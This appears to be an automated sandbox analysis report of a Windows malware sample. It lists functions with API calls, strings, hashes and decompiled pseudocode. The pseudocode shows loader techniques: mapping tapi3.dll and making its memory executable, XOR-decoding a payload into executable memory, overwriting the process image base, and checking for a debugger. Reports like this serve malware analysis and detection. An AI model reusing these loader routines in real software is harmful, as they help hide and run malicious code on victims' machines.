Function 00465B30, Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 278clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00466130: __time64.LIBCMT ref: 00466137

__mbstowcs_l.LIBCMTD ref: 00465BE0
_printf.LIBCMT ref: 00465BFF
_memset.LIBCMT ref: 00465DC4
_memset.LIBCMT ref: 00465DD7
_memset.LIBCMT ref: 00465DEA
GetClipboardViewer.USER32 ref: 00465E83

Part of subcall function 00465700: _memset.LIBCMT ref: 004658CA
Part of subcall function 00465700: _memset.LIBCMT ref: 004658DD
Part of subcall function 00465700: _memset.LIBCMT ref: 004658F0

Part of subcall function 004664D0: _memset.LIBCMT ref: 004666A3
Part of subcall function 004664D0: _memset.LIBCMT ref: 004666B6
Part of subcall function 004664D0: _memset.LIBCMT ref: 004666C9

Strings

$0E, xrefs: 00465EBB
), xrefs: 00465D40
(, xrefs: 00465D2C
.$0E, xrefs: 00465F26
4, xrefs: 0046605F
0, xrefs: 00465D65
#, xrefs: 00465C0E
%, xrefs: 00465D9E
), xrefs: 00465F9A
,, xrefs: 00465D6F
$, xrefs: 00465DB2
,, xrefs: 00465DA8
d, xrefs: 00465B94
1, xrefs: 00465C48
I, xrefs: 00465FD5
., xrefs: 00465C23
(, xrefs: 00465C64
E, xrefs: 00465F6A

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset$ClipboardViewer__mbstowcs_l__time64_printf
String ID: #$$$$0E$%$($($)$)$,$,$.$.$0E$0$1$4$E$I$d
API String ID: 1608630491-2360498873
Opcode ID: 148077b0c63a78c9abe49763fc62a40806259ca165aaf537506a8ea09efd280e
Instruction ID: 700c67253eb6594f03873fa8a082217b5a17d7b849bcb616d1a63a29c799b457
Opcode Fuzzy Hash: 148077b0c63a78c9abe49763fc62a40806259ca165aaf537506a8ea09efd280e
Instruction Fuzzy Hash: 3CE13870D05268CAEB24DF69CC54BEDBBB1AF59304F0481E9D14CA7282E7B94B84CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00401A64, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 102
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401A64(void* __ecx, long _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				struct _MEMORY_BASIC_INFORMATION _v44;
				short _v564;
				void* _t18;
				void* _t19;
				void* _t21;
				void* _t23;
				long _t29;
				void* _t35;
				void* _t37;

				_t35 = __ecx;
				_t37 = 0;
				_push(0x103);
				_v12 = 0;
				_push( &_v564);
				if( *0x403330 != 1) {
					_push(L"%SystemRoot%\\system32\\tapi3.dll");
				} else {
					_push(L"%SystemRoot%\\SysWOW64\\tapi3.dll");
				}
				ExpandEnvironmentStringsW();
				_t18 = CreateFileW( &_v564, 0xa0000000, 1, 0, 3, 0, 0); // executed
				_v8 = _t18;
				if(_t18 == 0xffffffff) {
					L15:
					_t19 = VirtualAllocEx(0xffffffff, 0, _a4, 0x3000, 0x40); // executed
					_t37 = _t19;
					goto L16;
				} else {
					_t21 = CreateFileMappingW(_t18, 0, 0x1000020, 0, 0, 0); // executed
					_v16 = _t21;
					if(_t21 != 0) {
						_t23 = MapViewOfFileEx(_t21, 4, 0, 0, 0, 0); // executed
						_t37 = _t23;
						if(_t37 != 0) {
							E00401EF0(_t35,  &_v44, 0, 0x1c);
							if(VirtualQueryEx(0xffffffff, _t37,  &_v44, 0x1c) == 0 || _v44.AllocationBase == 0) {
								_t29 = 0;
							} else {
								_t29 = _v44.RegionSize;
							}
							if(_t29 < _a4 || VirtualProtectEx(0xffffffff, _t37, _t29, 0x40,  &_v12) == 0) {
								UnmapViewOfFile(_t37);
								_t37 = 0;
							}
						}
						FindCloseChangeNotification(_v16); // executed
					}
					CloseHandle(_v8);
					if(_t37 != 0) {
						L16:
						return _t37;
					} else {
						goto L15;
					}
				}
			}

0x00401a64
0x00401a71
0x00401a7a
0x00401a85
0x00401a88
0x00401a89
0x00401a92
0x00401a8b
0x00401a8b
0x00401a8b
0x00401a97
0x00401ab0
0x00401ab6
0x00401abc
0x00401b4f
0x00401b5c
0x00401b62
0x00000000
0x00401ac2
0x00401acd
0x00401ad9
0x00401ade
0x00401ae7
0x00401aed
0x00401af1
0x00401afa
0x00401b10
0x00401b1c
0x00401b17
0x00401b17
0x00401b17
0x00401b21
0x00401b38
0x00401b3e
0x00401b3e
0x00401b21
0x00401b43
0x00401b43
0x00401b48
0x00401b4d
0x00401b64
0x00401b69
0x00000000
0x00000000
0x00000000
0x00401b4d

APIs

ExpandEnvironmentStringsW.KERNEL32(%SystemRoot%\system32\tapi3.dll,?,00000103,00000000,00000000), ref: 00401A97
CreateFileW.KERNEL32(?,A0000000,00000001,00000000,00000003,00000000,00000000), ref: 00401AB0
CreateFileMappingW.KERNELBASE(00000000,00000000,01000020,00000000,00000000,00000000,00000000), ref: 00401ACD
MapViewOfFileEx.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 00401AE7
VirtualQueryEx.KERNEL32(000000FF,00000000,?,0000001C,?,00000000,0000001C), ref: 00401B08
VirtualProtectEx.KERNEL32(000000FF,00000000,?,00000040,?), ref: 00401B2D
UnmapViewOfFile.KERNEL32(00000000), ref: 00401B38
FindCloseChangeNotification.KERNEL32(00000000), ref: 00401B43
CloseHandle.KERNEL32(?), ref: 00401B48
VirtualAllocEx.KERNEL32(000000FF,00000000,?,00003000,00000040), ref: 00401B5C

Strings

%SystemRoot%\system32\tapi3.dll, xrefs: 00401A92
%SystemRoot%\SysWOW64\tapi3.dll, xrefs: 00401A8B

Memory Dump Source

Source File: 00000000.00000002.309850072.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.309858530.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: File$Virtual$CloseCreateView$AllocChangeEnvironmentExpandFindHandleMappingNotificationProtectQueryStringsUnmap
String ID: %SystemRoot%\SysWOW64\tapi3.dll$%SystemRoot%\system32\tapi3.dll
API String ID: 2285273178-2587703990
Opcode ID: 7ea4ae7d62663dac588de496447d734ad1b4c255d74485fb057ddaeff3d2a4e4
Instruction ID: ff1ab7b9a154434b078cfd845dddc1b4d5ca4656e23ee3035cdc8c4c75dd8609
Opcode Fuzzy Hash: 7ea4ae7d62663dac588de496447d734ad1b4c255d74485fb057ddaeff3d2a4e4
Instruction Fuzzy Hash: 52316F71601224BBDB209BA29D4DFDF7E7DEB457A0F104126F615B21E0D7789940CAB8

Uniqueness

Uniqueness Score: -1.00%

Function 00401C93, Relevance: 6.1, APIs: 4, Instructions: 115
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00401C93(void* __ecx, intOrPtr _a4, intOrPtr _a8, int _a12) {
				void* _v8;
				char _v12;
				void* __edi;
				int _t22;
				void* _t28;
				void* _t43;
				void* _t59;

				_t47 = __ecx;
				_push(__ecx);
				_push(__ecx);
				if(_a4 != 0 && _a8 != 0) {
					_t22 = _a12;
					if(_t22 != 0 &&  *((char*)(_t22 + 0xc)) != 0) {
						_t22 = VirtualAllocEx(0xffffffff, 0, 0x2ca, 0x3000, 4); // executed
						_t43 = _t22;
						if(_t43 != 0) {
							E00401EA8(_t47, _t43, _a12, 0x2ca);
							if(E00401C1C(_t43, 0, 0) != 0) {
								_t28 = E00401A64(_t47,  *((intOrPtr*)(_t43 + 0xd2)) + 0x40); // executed
								_t59 = _t28;
								_v8 = _t59;
								if(_t59 != 0) {
									E00401EA8(_t47, _t59, _a4,  *((intOrPtr*)(_t43 + 0xd6)));
									if(E00401C1C(_a12,  &_v12, 0) == 0) {
										L14:
										VirtualFreeEx(0xffffffff, _t43, 0, 0x8000);
										_t22 = VirtualFreeEx(0xffffffff, _v8, 0, 0x8000);
									} else {
										 *((intOrPtr*)(_a12 + 0xc6)) = _t59;
										E00401EF0(_t47, _a12 + 0x172, 0, 0xd8);
										if(E00401C1C(_a12,  &_v12, 1) == 0) {
											goto L14;
										} else {
											_t16 = _t43 + 0x8d; // 0x8d
											if(E00401B6C(_t16, _t59, _a4) == 0) {
												goto L14;
											} else {
												E00401EF0(_t47, _a4, 0, _a8);
												_t19 = _t43 + 0x8d; // 0x8d
												if(E00401DE0(_t19, _t59, _t59) != 0) {
													E00401BC1(_t59); // executed
													_t22 =  *((intOrPtr*)( *((intOrPtr*)(_t43 + 0xba)) + _t59))(); // executed
												} else {
													goto L14;
												}
											}
										}
									}
								} else {
									_push(0x8000);
									_push(_t28);
									goto L9;
								}
							} else {
								_push(0x8000);
								_push(0);
								L9:
								_t22 = VirtualFreeEx(0xffffffff, _t43, ??, ??);
							}
						}
					}
				}
				return _t22;
			}

0x00401c93
0x00401c96
0x00401c97
0x00401c9e
0x00401cad
0x00401cb2
0x00401cd4
0x00401cda
0x00401cde
0x00401ce9
0x00401cfa
0x00401d0e
0x00401d13
0x00401d15
0x00401d1a
0x00401d3a
0x00401d4e
0x00401daa
0x00401dbb
0x00401dc5
0x00401d50
0x00401d58
0x00401d66
0x00401d77
0x00000000
0x00401d79
0x00401d7c
0x00401d8a
0x00000000
0x00401d8c
0x00401d94
0x00401d9b
0x00401da8
0x00401dd2
0x00401dd7
0x00000000
0x00000000
0x00000000
0x00401da8
0x00401d8a
0x00401d77
0x00401d1c
0x00401d1c
0x00401d21
0x00000000
0x00401d21
0x00401cfc
0x00401cfc
0x00401d01
0x00401d22
0x00401d25
0x00401d25
0x00401cfa
0x00401dda
0x00401cb2
0x00401ddd

APIs

VirtualAllocEx.KERNEL32(000000FF,00000000,000002CA,00003000,00000004,00000000,00000000,00000000,?,?,?,00401690,00000000,?,?,00000000), ref: 00401CD4
VirtualFreeEx.KERNEL32(000000FF,00000000,00000000,00008000,?,00000000,00000000,?,000002CA,?,?,?,00401690,00000000,?,?), ref: 00401D25
VirtualFreeEx.KERNEL32(000000FF,00000000,00000000,00008000,00000000,00000000,?,?,?,00000000,00000000,?,000002CA), ref: 00401DBB
VirtualFreeEx.KERNEL32(000000FF,?,00000000,00008000,?,?,?,00401690,00000000,?,?,00000000,00403000,?,?), ref: 00401DC5

Memory Dump Source

Source File: 00000000.00000002.309850072.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.309858530.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 50474ef40392900078d1c1e9966c05bd9e0f654d43ca66715a63aa594671440b
Instruction ID: f9fcf59574da430c1a6b732967f2834c2ec0a047f5effb3bdd3c8fa8699f7250
Opcode Fuzzy Hash: 50474ef40392900078d1c1e9966c05bd9e0f654d43ca66715a63aa594671440b
Instruction Fuzzy Hash: 3231A532641214BBEB219F52CC45F9F3A69AF41768F144137FE14BA1E2C678E801C7B8

Uniqueness

Uniqueness Score: -1.00%

Function 004014F4, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004014F4(void* __esi, long* _a4, intOrPtr* _a8) {
				signed int _v5;
				void* _v12;
				long _v16;
				long _v20;
				int _t28;
				void* _t29;
				void* _t30;
				intOrPtr _t35;
				void* _t38;
				long* _t43;
				long _t47;
				void* _t48;

				_t48 = __esi;
				if(__esi == 0) {
					L9:
					return 0;
				}
				_t47 =  *(__esi + 0x10);
				if(_t47 == 0 || _a8 == 0) {
					goto L9;
				} else {
					_v20 = _v20 & 0x00000000;
					_v5 =  *((intOrPtr*)(__esi + 0x20));
					_v16 = _t47 << 2;
					_t9 = _t48 + 0x21; // 0x21
					_t38 = _t9;
					_t28 = VirtualProtectEx(0xffffffff, _t38, _t47, 0x40,  &_v20); // executed
					if(_t28 == 0) {
						goto L9;
					}
					_t29 = 0;
					if(_t47 == 0) {
						L6:
						_t30 = VirtualAllocEx(0xffffffff, 0, _v16, 0x3000, 0x40); // executed
						_v12 = _t30;
						if(_t30 == 0) {
							goto L9;
						}
						_t41 = _t47;
						if(E0040172C(_t38, _t47, _t30,  *((intOrPtr*)(_t48 + 0x1c)) + 1) != 0xffffffff) {
							E00401EF0(_t41, _t38, 0, _t47);
							_t35 = E0040141D( *((intOrPtr*)(_t48 + 0x1c)), _v12);
							if(_t35 == 0) {
								goto L8;
							}
							_t43 = _a4;
							if(_t43 != 0) {
								 *_t43 = _v16;
							}
							 *_a8 = _t35;
							return _v12;
						}
						L8:
						VirtualFreeEx(0xffffffff, _v12, 0, 0x8000);
						goto L9;
					} else {
						goto L5;
					}
					do {
						L5:
						 *(_t29 + _t38) =  *(_t29 + _t38) ^ _v5;
						_t29 = _t29 + 1;
					} while (_t29 < _t47);
					goto L6;
				}
			}

0x004014f4
0x004014fe
0x00401590
0x00000000
0x00401590
0x00401504
0x00401509
0x00000000
0x00401515
0x00401518
0x0040151c
0x00401524
0x0040152e
0x0040152e
0x00401534
0x0040153c
0x00000000
0x00000000
0x0040153e
0x00401542
0x0040154f
0x0040155d
0x00401563
0x00401568
0x00000000
0x00000000
0x00401570
0x0040157c
0x0040159c
0x004015a7
0x004015ae
0x00000000
0x00000000
0x004015b0
0x004015b5
0x004015ba
0x004015ba
0x004015bf
0x00000000
0x004015c1
0x0040157e
0x0040158a
0x00000000
0x00000000
0x00000000
0x00000000
0x00401544
0x00401544
0x00401547
0x0040154a
0x0040154b
0x00000000
0x00401544

APIs

VirtualProtectEx.KERNEL32(000000FF,00000021,?,00000040,00000000,?,00000000), ref: 00401534
VirtualAllocEx.KERNEL32(000000FF,00000000,00000000,00003000,00000040,?,00000000), ref: 0040155D
VirtualFreeEx.KERNEL32(000000FF,?,00000000,00008000,00000021,00000000,?,00000000,?,?,00000000), ref: 0040158A

Memory Dump Source

Source File: 00000000.00000002.309850072.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.309858530.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreeProtect
String ID:
API String ID: 267585107-0
Opcode ID: fe66257a1f73ed0b155cc7ecb0db77d5d6d1a3ba21762caee2cd5fb9bfd8b697
Instruction ID: 60848499d300f86fbef513db6b8c65875fd33c34f0bfce4cd9a3d67e81c81be2
Opcode Fuzzy Hash: fe66257a1f73ed0b155cc7ecb0db77d5d6d1a3ba21762caee2cd5fb9bfd8b697
Instruction Fuzzy Hash: 4A21E531600304BBDB218B68CC41F6FB7B9AF88750F14462AF522BE2E0D634E901CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0046D59B, Relevance: 3.0, APIs: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0046D5B3

Part of subcall function 0046F7BA: __mtinitlocknum.LIBCMT ref: 0046F7CE
Part of subcall function 0046F7BA: __amsg_exit.LIBCMT ref: 0046F7DA
Part of subcall function 0046F7BA: RtlEnterCriticalSection.NTDLL(?), ref: 0046F7E2

__tzset_nolock.LIBCMT ref: 0046D5C4

Part of subcall function 0046CEB9: __lock.LIBCMT ref: 0046CEDB
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CEFF
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CF1A
Part of subcall function 0046CEB9: __invoke_watson.LIBCMT ref: 0046CF35
Part of subcall function 0046CEB9: ____lc_codepage_func.LIBCMT ref: 0046CF3D
Part of subcall function 0046CEB9: _strlen.LIBCMT ref: 0046CF9D
Part of subcall function 0046CEB9: __malloc_crt.LIBCMT ref: 0046CFA4
Part of subcall function 0046CEB9: _strlen.LIBCMT ref: 0046CFBA

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __invoke_watson$__lock_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__malloc_crt__mtinitlocknum__tzset_nolock
String ID:
API String ID: 4249203040-0
Opcode ID: 34486a136c314bdbb2aa6c71ee9808a9741bf43a35ccfb2515075a6e4ae2af8b
Instruction ID: fd0474b085ff404bd2e571feb78e13acf7435792ef62a450d1af9b86101bcb34
Opcode Fuzzy Hash: 34486a136c314bdbb2aa6c71ee9808a9741bf43a35ccfb2515075a6e4ae2af8b
Instruction Fuzzy Hash: 13E0CDB1D41610E5C751FBA1590231D72B0BB24B19F30017FF491516C2FB380688C6DF

Uniqueness

Uniqueness Score: -1.00%

Function 006005DB, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,00600327,2B14D0EE,?), ref: 00600607

Memory Dump Source

Source File: 00000000.00000002.310020710.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction ID: 75ec10c5459d07452e55f8632ca00455072afdf7e9f947bb24b36caacec344cf
Opcode Fuzzy Hash: 76b35eb126b5d398c3241770d81ee5b7efebad686aa1f8164dd06303da8c9cbe
Instruction Fuzzy Hash: A0114C75690215ABEB14CF08C880AA673AAFF84768B198065EC49DB342D671FD218B90

Uniqueness

Uniqueness Score: -1.00%

Function 02451996, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 024519A6

Memory Dump Source

Source File: 00000000.00000002.310730492.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 969c679d467585fe097550c84f6686814801fec1d9dff6020c96baa77cdad659
Instruction ID: 58f70bd73a2ce6cf2775bdcefb85e762420b2c6e3281e72158bad63f7ced2437
Opcode Fuzzy Hash: 969c679d467585fe097550c84f6686814801fec1d9dff6020c96baa77cdad659
Instruction Fuzzy Hash: F4B09B701892C14FC34153214C2AC537B241E6211135D81E5D0844615AC51C0935D7B2

Uniqueness

Uniqueness Score: -1.00%

Function 02451CA8, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02451CB8

Memory Dump Source

Source File: 00000000.00000002.310730492.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c9917b9213a926fa0755aba9efcd971d396b684c065d7756cc06cf40a275679
Instruction ID: 9601090c3cf8a5cc2617eb28338039ba8281a0f60234f3b710d797c5aca647a6
Opcode Fuzzy Hash: 2c9917b9213a926fa0755aba9efcd971d396b684c065d7756cc06cf40a275679
Instruction Fuzzy Hash: DFB0927018A2D14BC742A3214829AA77B582BA2211BADC0EAD0801A14ECA180635E3A3

Uniqueness

Uniqueness Score: -1.00%

Function 024529F6, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02452A06

Memory Dump Source

Source File: 00000000.00000002.310730492.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 028e36f3d3aae680b40afe16a7d92d7898daecc78d38e73c8e167454168b6fee
Instruction ID: c214e361e1a450b27ed17935694eab7c9ceeb45afb733570b93213ec971ddc4a
Opcode Fuzzy Hash: 028e36f3d3aae680b40afe16a7d92d7898daecc78d38e73c8e167454168b6fee
Instruction Fuzzy Hash: 7DB09B7554A2814FC3415311081D5522B141BA511076DC0D9D0440615AC9180575D7A2

Uniqueness

Uniqueness Score: -1.00%

Function 02452AFC, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02452B0C

Memory Dump Source

Source File: 00000000.00000002.310730492.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1595d9c6c9ea2bb3aa6e1a6e3b826491561ed4291c4a3621b44f04ce492217a7
Instruction ID: 6a4e87d60427ced14f4c427596898b7826084bc878bc3df9ac1d1a52fd68a84a
Opcode Fuzzy Hash: 1595d9c6c9ea2bb3aa6e1a6e3b826491561ed4291c4a3621b44f04ce492217a7
Instruction Fuzzy Hash: DAB09B7164D2814BC3415321081D5526B141B7621076D80DDD0800515AD9180531D797

Uniqueness

Uniqueness Score: -1.00%

Function 02451FBA, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 02451FCA

Memory Dump Source

Source File: 00000000.00000002.310730492.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction ID: f460b8a2c2b4f386ac525e72ce140bdeb14cb6dc77e8e94d45d6a8a21869dd15
Opcode Fuzzy Hash: 1cacb4d76965ee7aec90e8d59cbc4c6dd3d6d13f75afdeedfd96a81e330b5fd0
Instruction Fuzzy Hash: 7EB0927018A2C64BC30197210C29AA77B582BA1212BAD81AED0C00655ACB280571A7B2

Uniqueness

Uniqueness Score: -1.00%

Function 0046A682, Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

__make__time64_t.LIBCMT ref: 0046A688

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: __make__time64_t
String ID:
API String ID: 1242165881-0
Opcode ID: 346630e11f1ee5a3441dd37804dce0ed885e3ff36472b19c64210fc271ae5001
Instruction ID: 47007f602433d6f7d6e26bde3218195ff3f181c202248e0ca23f1311f1b3762b
Opcode Fuzzy Hash: 346630e11f1ee5a3441dd37804dce0ed885e3ff36472b19c64210fc271ae5001
Instruction Fuzzy Hash: 56A022B22003002AC200A2808802B0833800FC0B00F20200EB20B080C3AAA088F02A03

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00465700, Relevance: 42.2, APIs: 7, Strings: 17, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004658CA
_memset.LIBCMT ref: 004658DD
_memset.LIBCMT ref: 004658F0
GetProcessHeap.KERNEL32 ref: 004659C2
PulseEvent.KERNEL32(00000020), ref: 00465A01
GetCommandLineA.KERNEL32 ref: 00465A2A
RtlAllocateHeap.NTDLL(?,00040000,00000BD7), ref: 00465A49

Part of subcall function 00465480: _memset.LIBCMT ref: 00465649
Part of subcall function 00465480: _memset.LIBCMT ref: 0046565C
Part of subcall function 00465480: _memset.LIBCMT ref: 0046566F

Strings

$, xrefs: 00465839
", xrefs: 00465739
-, xrefs: 00465B0E
/, xrefs: 00465726
,, xrefs: 00465979
+, xrefs: 00465759
*, xrefs: 00465843
-, xrefs: 00465732
!, xrefs: 00465868
*, xrefs: 00465760
", xrefs: 00465872
#, xrefs: 0046571F
*, xrefs: 004658B5
+, xrefs: 00465747
,, xrefs: 004658AB
+, xrefs: 00465883
., xrefs: 0046585E

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset$Heap$AllocateCommandEventLineProcessPulse
String ID: !$"$"$#$$$*$*$*$+$+$+$,$,$-$-$.$/
API String ID: 1246828854-234761896
Opcode ID: 19c3f43bf9c42374cf7d2b0703023e7434c025d3cca6d2fc616f89796bf3af09
Instruction ID: d0e18d3924f78b2e5a40437ed3d8f451c71f4136e27571aa874f96deab625756
Opcode Fuzzy Hash: 19c3f43bf9c42374cf7d2b0703023e7434c025d3cca6d2fc616f89796bf3af09
Instruction Fuzzy Hash: 56B12D70D042A9CAEB20CF64DD58BDDBBB1AF55304F0081E9D54DA7381D7B94A84CF56

Uniqueness

Uniqueness Score: -1.00%

Function 0046A91D, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0046DD53
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0046DD68
UnhandledExceptionFilter.KERNEL32(0047A6B0), ref: 0046DD73
GetCurrentProcess.KERNEL32(C0000409), ref: 0046DD8F
TerminateProcess.KERNEL32(00000000), ref: 0046DD96

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 63cdc36b2a330fd1ca6b7e919bda516e5bd17e60cd1f123a24149354f10ba704
Instruction ID: 2d47b1f5393d2efb13456d14475326a92099908a080006c87d6d8ddfad89470b
Opcode Fuzzy Hash: 63cdc36b2a330fd1ca6b7e919bda516e5bd17e60cd1f123a24149354f10ba704
Instruction Fuzzy Hash: 5721CAF4902204AFD740EF69ED497983BA4BB68305F20417BE50CD6371E7B459988F0E

Uniqueness

Uniqueness Score: -1.00%

Function 00600408, Relevance: 1.4, Strings: 1, Instructions: 145COMMON

Download Yara Rule

Strings

.dll, xrefs: 0060055F

Memory Dump Source

Source File: 00000000.00000002.310020710.0000000000600000.00000040.00000001.sdmp, Offset: 00600000, based on PE: false

Similarity

API ID:
String ID: .dll
API String ID: 0-2738580789
Opcode ID: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction ID: 02b2c0a05d81fe7037f611035dfc40b5349fe55099c9eaa7e1d706b4b7083496
Opcode Fuzzy Hash: 135e0967f3cc20ca14d17b168d30b59c40d10e9d8b5e7183516c95ca34c9fdab
Instruction Fuzzy Hash: F1517D30940619EFEB29CF54C5807EEB7B2EF04305F1085AED945AB781D774AA81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00401BC1, Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401BC1(signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;

				_v24 = _v24 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_v12 = _v12 & 0x00000000;
				_v20 =  *[fs:0x30];
				_v16 = _v16 & 0x00000000;
				if(_a4 != 0) {
					if(_v20 == 0) {
						L4:
						return 0;
					}
					_v12 =  *((intOrPtr*)(_v20 + 0xc));
					if(_v12 != 0) {
						_v8 =  *(_v20 + 8);
						 *(_v20 + 8) = _a4;
						return _a4;
					}
					goto L4;
				}
				return 0;
			}

0x00401bc7
0x00401bcb
0x00401bcf
0x00401bd9
0x00401bdc
0x00401be4
0x00401bee
0x00401bff
0x00000000
0x00401bff
0x00401bf6
0x00401bfd
0x00401c09
0x00401c12
0x00000000
0x00401c15
0x00000000
0x00401bfd
0x00000000

Memory Dump Source

Source File: 00000000.00000002.309850072.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.309858530.0000000000433000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df191f082b5990dfab599ecd71119ab7ac8e384d6a17474b05c13a7fc8b4c65d
Instruction ID: 77d2e4c9e962168750cf32f44f3e1d7fa49b59cce46d46dbd80ad947b8a5af11
Opcode Fuzzy Hash: df191f082b5990dfab599ecd71119ab7ac8e384d6a17474b05c13a7fc8b4c65d
Instruction Fuzzy Hash: B201C975D54209DFDB00CF98C488BAEB7F0BB14356F10886AD805A7391D378DA84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00465480, Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 116COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00465649
_memset.LIBCMT ref: 0046565C
_memset.LIBCMT ref: 0046566F

Strings

*, xrefs: 00465634
2, xrefs: 0046562A
", xrefs: 004654B8
#, xrefs: 004655FB
", xrefs: 004654B1
1, xrefs: 004655B8
, xrefs: 00465620
", xrefs: 004654DF
2, xrefs: 0046560C
0, xrefs: 0046549E
', xrefs: 004654AD
%, xrefs: 004654D8
!, xrefs: 004654BF
2, xrefs: 00465602
#, xrefs: 004655E7
', xrefs: 004655F1

Memory Dump Source

Source File: 00000000.00000002.309868380.0000000000435000.00000020.00020000.sdmp, Offset: 00435000, based on PE: false

Similarity

API ID: _memset
String ID: $!$"$"$"$#$#$%$'$'$*$0$1$2$2$2
API String ID: 2102423945-3661243402
Opcode ID: 74704727a06b6c581659efdf0d34761b66777fed0e1a3b33ba01139ccbff8de4
Instruction ID: 4d12989412911d3be82f1898c46339c032e289c7a4e2019be794ed19b57e04df
Opcode Fuzzy Hash: 74704727a06b6c581659efdf0d34761b66777fed0e1a3b33ba01139ccbff8de4
Instruction Fuzzy Hash: 32510C709083A99AEB21DF64DC187DDBBB1AF15308F0490D9D04CBB282D7BA0B84DF56

Uniqueness

Uniqueness Score: -1.00%

Function 0040116C, Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 191
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040116C() {
				void* _v8;
				int _v12;
				int* _v16;
				int* _v20;
				intOrPtr _v24;
				char _v28;
				char _v40;
				char _v56;
				char _v120;
				char _v184;
				char _v248;
				char _v508;
				char _t60;
				intOrPtr _t61;
				void* _t73;
				void* _t77;
				void* _t81;
				long _t90;
				long _t99;
				void* _t108;
				int _t112;
				void* _t116;
				void* _t117;
				char _t124;

				_t60 =  *0x40212c; // 0x152e372c
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsd");
				asm("movsd");
